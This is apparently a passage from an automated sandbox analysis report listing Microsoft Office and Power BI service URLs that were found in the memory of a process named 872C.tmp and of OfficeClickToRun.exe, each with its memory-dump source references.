    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apisateEL
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apitdl
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E4E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053030823.00000248C2CC5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055406879.00000248C2CC6000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.aadrm.com/
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.cortana.aiBearer
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.diagnostics.office.comBearer
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.diagnostics.office.comhttps://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060962016.00000248C320D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file-4
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.diagnosticssdf.office.com/v2/fileR-
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392408338.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394188424.0000000005646000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395189426.000000000550D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392543505.0000000003CEA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392489428.0000000005645000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E4E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003D26000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.office.net
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/drive/root/rootk
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/shares/ares/x75
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/v1.0
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.comMBI
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasetsd1-
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasetsspx
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups.0-LM
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsBearer
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/importsBearer
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/importse2PL&
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/importspp
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059765755.00000248C2D40000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055975744.00000248C2D3C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055272677.00000248C2D3C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.scheduler.
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.mobile.m365.svc.cloud.microsoft30
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2016612588.00000248C2D7B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059927373.00000248C2D7D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013229601.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.powerbi.com
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v2Bearer
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v2https://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com1AugloopPolymer1CdnStoragehttps://res.cdn.office.net/polymer/modelsAugloop
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1665092686.00000248C2B67000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013710001.00000248C2B5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlh
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.officeapps.live.com/m/broadcasthost.asmx
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/create-module43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/fontsH
